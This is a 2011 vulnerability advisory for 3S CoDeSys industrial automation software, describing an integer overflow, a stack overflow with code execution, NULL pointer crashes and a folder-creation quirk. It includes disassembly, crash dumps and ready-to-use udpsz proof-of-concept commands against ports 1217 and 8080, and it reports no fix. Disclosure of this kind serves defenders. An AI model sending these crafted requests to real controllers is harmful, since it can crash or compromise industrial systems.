####################################################################### Luigi Auriemma Application: 3S CoDeSys http://www.3s-software.com/index.shtml?en_CoDeSysV3_en Versions: <= 3.4 SP4 Patch 2 Platforms: Windows Bugs: A] GatewayService integer overflow B] CmpWebServer stack overflow C] CmpWebServer Content-Length NULL pointer D] CmpWebServer invalid HTTP request NULL pointer E] CmpWebServer folders creation Exploitation: remote Date: 29 Nov 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bugs 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's homepage: "The CoDeSys Automation Suite is a comprehensive software tool for industrial automation technology. All common automation tasks solved by means of software can be realized with the CoDeSys Suite based on the wide-spread controller and PLC development system of the same name." ####################################################################### ======= 2) Bugs ======= ---------------------------------- A] GatewayService integer overflow ---------------------------------- GatewayService uses a 32bit value at offset 0x0c of the header which specifies the size of the data to receive. The program takes this number, adds 0x34 and allocates that amount of memory resulting in an integer overflow: 0042CB30 /$ 55 PUSH EBP 0042CB31 |. 8BEC MOV EBP,ESP 0042CB33 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0042CB36 |. 83C0 34 ADD EAX,34 0042CB39 |. 5D POP EBP 0042CB3A \. C3 RETN ... 00447AF7 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C] 00447AFA |. 50 PUSH EAX 00447AFB |. E8 3050FEFF CALL GatewayS.0042CB30 ; + 0x34 00447B00 |. 83C4 04 ADD ESP,4 00447B03 |. 8945 0C MOV DWORD PTR SS:[EBP+C],EAX 00447B06 |> 6A 01 PUSH 1 00447B08 |. 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C] 00447B0B |. 51 PUSH ECX 00447B0C |. E8 A7050200 CALL GatewayS.004680B8 ; allocation ------------------------------ B] CmpWebServer stack overflow ------------------------------ CmpWebServer is the component used in services like 3SRTESrv3 and CoDeSysControlService for handling the HTTP connections on port 8080. The library is affected by a buffer overflow in the function 0040f480 that copies the input URI in a limited stack buffer allowing code execution: 0040F5C5 |> 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C] 0040F5C8 |. 2B55 08 SUB EDX,DWORD PTR SS:[EBP+8] 0040F5CB |. 52 PUSH EDX 0040F5CC |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8] 0040F5CF |. 50 PUSH EAX 0040F5D0 |. 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10] 0040F5D3 |. 51 PUSH ECX 0040F5D4 |. E8 97420000 CALL CoDeSysC.00413870 ; memcpy ------------------------------------------- C] CmpWebServer Content-Length NULL pointer ------------------------------------------- NULL pointer caused by the lack of checks on the memory allocated trusting the Content-Length value of an HTTP POST request: eax=812aa3a7 ebx=00a7ae7c ecx=20000000 edx=00000000 esi=012aa3a7 edi=00000000 eip=0128cc9a esp=02e9feec ebp=02e9fef4 iopl=0 nv up ei pl nz ac po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212 CmpWebServer!ComponentEntry+0xb37a: 0128cc9a f3a5 rep movs dword ptr es:[edi],dword ptr [esi] ------------------------------------------------- D] CmpWebServer invalid HTTP request NULL pointer ------------------------------------------------- NULL pointer caused by the usage of an unexpected HTTP request different than GET, POST or HEAD: eax=028228d4 ebx=00000009 ecx=00000004 edx=02822957 esi=00000000 edi=00000005 eip=0128dd6c esp=02e9fed4 ebp=02e9fee0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 CmpWebServer!ComponentEntry+0xc44c: 0128dd6c 3a51fc cmp dl,byte ptr [ecx-4] ds:0023:00000000=?? -------------------------------- E] CmpWebServer folders creation -------------------------------- Not a security bug (at least at the moment) but enough weird and funny to note. The webserver calls CreateDirectory at address 0041206d before doing a secondary CreateFile (read mode). The only possible attack scenario I can imagine may be in case the server automatically generates logs or other files and this bug will prevent their creation due to the presence of folders with the same names, but I don't know the software enough to confirm this scenario. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip A] udpsz -T -b 0x61 -X 0xc 32 l 0xfffffff2 -1 -l 0 -D SERVER 1217 0xffff B] udpsz -c "GET /" 0 -b a -c "\\a HTTP/1.0\r\n\r\n" -1 -T -D SERVER 8080 8192 C] udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1 D] udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1 E] udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1 udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1 udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1 udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1 udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1 ... ####################################################################### ====== 4) Fix ====== No fix. #######################################################################